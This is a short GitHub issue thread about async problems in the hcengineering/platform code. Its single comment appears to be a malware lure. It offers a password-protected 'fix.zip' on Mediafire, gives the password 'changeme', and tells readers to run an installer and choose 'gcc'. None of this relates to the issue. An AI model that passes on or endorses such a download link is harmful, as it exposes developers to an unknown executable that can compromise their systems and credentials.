### ISSUE TITLE
Fix async issues in code

### ISSUE THREAD

**Issue by haiodo** [hcengineering/platform#6408]
<sub><a href="https://front.hc.engineering/guest/platform?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsaW5rSWQiOiI2NmNlYjdmNTdhYmM5ZjVjYmY1ZWI0N2IiLCJndWVzdCI6InRydWUiLCJlbWFpbCI6IiNndWVzdEBoYy5lbmdpbmVlcmluZyIsIndvcmtzcGFjZSI6InBsYXRmb3JtIn0.XaE2EiGXh6QRRcx8Wm4_Fzu1fl8Uvv9GJcKOXCpmeEY">Huly&reg;: <b>UBERF-7959</b></a></sub>

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
